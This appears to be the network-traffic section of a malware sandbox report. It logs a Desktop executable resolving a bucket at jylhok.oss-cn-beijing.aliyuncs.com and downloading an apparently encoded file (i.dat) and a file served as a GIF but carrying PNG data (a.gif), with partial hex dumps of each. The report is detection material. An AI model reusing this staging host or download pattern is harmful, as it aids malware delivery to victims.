                                Jan 7, 2025 04:15:43.691338062 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.695791006 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.734791994 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.734802008 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.734812975 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.734895945 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.767601967 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.767611027 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767623901 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767635107 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767731905 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.767740965 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767752886 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767771959 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.767776966 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767793894 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767853975 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.767858028 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767875910 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767891884 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.767891884 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.767898083 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.767939091 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.767998934 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:43.975337029 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:43.975483894 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.053200006 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.053210974 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.053312063 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.090131044 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.090137959 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.090150118 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.090176105 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.090183973 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.090220928 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.090228081 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.090347052 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.090353966 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.090361118 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.090388060 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.090394020 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.090415001 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.090476036 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.090533018 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.299329042 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.299395084 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.379218102 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.379229069 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.379334927 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.420080900 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.420089960 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.420101881 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.420115948 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.420121908 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.420165062 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.420171022 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.420275927 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.420283079 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.420293093 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.420315027 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.420320988 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.420409918 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.420474052 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.627335072 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.627430916 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.723856926 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.723886013 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.723908901 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.723927975 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.723932981 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.724050999 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.724060059 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.724081993 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.724121094 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.724128008 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.724220991 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.724281073 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:44.931333065 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:44.931375027 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:45.114193916 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:45.114207983 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:45.114223957 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:45.114239931 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:45.114244938 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:45.114327908 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:45.114335060 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:45.114474058 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:45.114484072 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:45.114516973 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:45.114572048 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:45.114603043 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:45.524204969 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:46.356285095 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:46.356328964 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:46.543457985 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:46.543509960 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:46.543626070 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:46.543857098 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:46.543875933 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:47.758546114 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:47.758624077 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:47.759099960 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:47.759105921 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:47.759392977 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:47.759397984 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.102488041 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.102509022 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.102595091 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.102619886 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.102663994 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.103157997 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.103215933 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.104279041 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.104355097 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.108228922 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.108305931 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.189912081 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.190017939 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.190283060 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.190352917 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.190521955 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.190582037 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.190587997 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.190635920 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.190639019 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.190684080 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.190767050 CET49713443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.190779924 CET4434971339.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.204998016 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.205018997 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:48.205104113 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.205292940 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:48.205301046 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.431031942 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.431165934 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.431648016 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.431654930 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.431875944 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.431881905 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.759516954 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.759542942 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.759629011 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.759654999 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.759670019 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.759705067 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.759763956 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.759816885 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.759824038 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.759880066 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.760234118 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.760282040 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.760302067 CET4434971439.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:49.760351896 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.762985945 CET49714443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:49.763003111 CET4434971439.103.20.48192.168.2.8

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 7, 2025 04:15:30.283509970 CET5390353192.168.2.81.1.1.1
                                Jan 7, 2025 04:15:31.088064909 CET53539031.1.1.1192.168.2.8

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jan 7, 2025 04:15:30.283509970 CET192.168.2.81.1.1.10xff94Standard query (0)jylhok.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jan 7, 2025 04:15:31.088064909 CET1.1.1.1192.168.2.80xff94No error (0)jylhok.oss-cn-beijing.aliyuncs.comsc-2a1c.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                Jan 7, 2025 04:15:31.088064909 CET1.1.1.1192.168.2.80xff94No error (0)sc-2a1c.cn-beijing.oss-adns.aliyuncs.comsc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                Jan 7, 2025 04:15:31.088064909 CET1.1.1.1192.168.2.80xff94No error (0)sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.48A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • jylhok.oss-cn-beijing.aliyuncs.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.84970839.103.20.484437668C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                TimestampBytes transferredDirectionData
                                2025-01-07 03:15:32 UTC111OUTGET /i.dat HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:32 UTC557INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:32 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 512
                                Connection: close
                                x-oss-request-id: 677C9C5434D7B33034829C2B
                                Accept-Ranges: bytes
                                ETag: "6FE90B6ABE6C4D1079B730F10120B3D1"
                                Last-Modified: Mon, 06 Jan 2025 09:25:58 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 6796293658323038043
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000113
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: b+kLar5sTRB5tzDxASCz0Q==
                                x-oss-server-time: 2
                                2025-01-07 03:15:32 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 5a 49 5c 58 37 33 76 37 44 44 1a 54 3a 79 36 31 58 5b 58 5f 38 71 3e 33 5a 4a 46 5d 3e 2e 73 3e 51 53 11 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 0c 1f 0a 0e 61 65 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 59 4a 5f 5b 34 30 75 34 47 47 19 57 39 7a 35 32 5b 58 5b 5c 3b 72 3d 30 59 49 45 5e 3d 2d 70 3d 52 50 12 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 0d 1e 0b 0f 60 64 21
                                Data Ascii: l%00ZI\X73v7DDT:y61X[X_8q>3ZJF]>.s>QS_q86999999999999999999999999999999999QMMI:sffae aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33YJ_[40u4GGW9z52[X[\;r=0YIE^=-p=RP^p97888888888888888888888888888888888PLLH;rgg`d!


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.84970939.103.20.484437668C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                TimestampBytes transferredDirectionData
                                2025-01-07 03:15:34 UTC111OUTGET /a.gif HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:34 UTC546INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:34 GMT
                                Content-Type: image/gif
                                Content-Length: 135589
                                Connection: close
                                x-oss-request-id: 677C9C561F7AD933366386E7
                                Accept-Ranges: bytes
                                ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                Last-Modified: Mon, 06 Jan 2025 08:35:20 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 8642451798640735006
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                x-oss-server-time: 14
                                2025-01-07 03:15:34 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                2025-01-07 03:15:34 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                2025-01-07 03:15:34 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                2025-01-07 03:15:34 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                2025-01-07 03:15:34 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                                2025-01-07 03:15:34 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                2025-01-07 03:15:34 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                2025-01-07 03:15:34 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
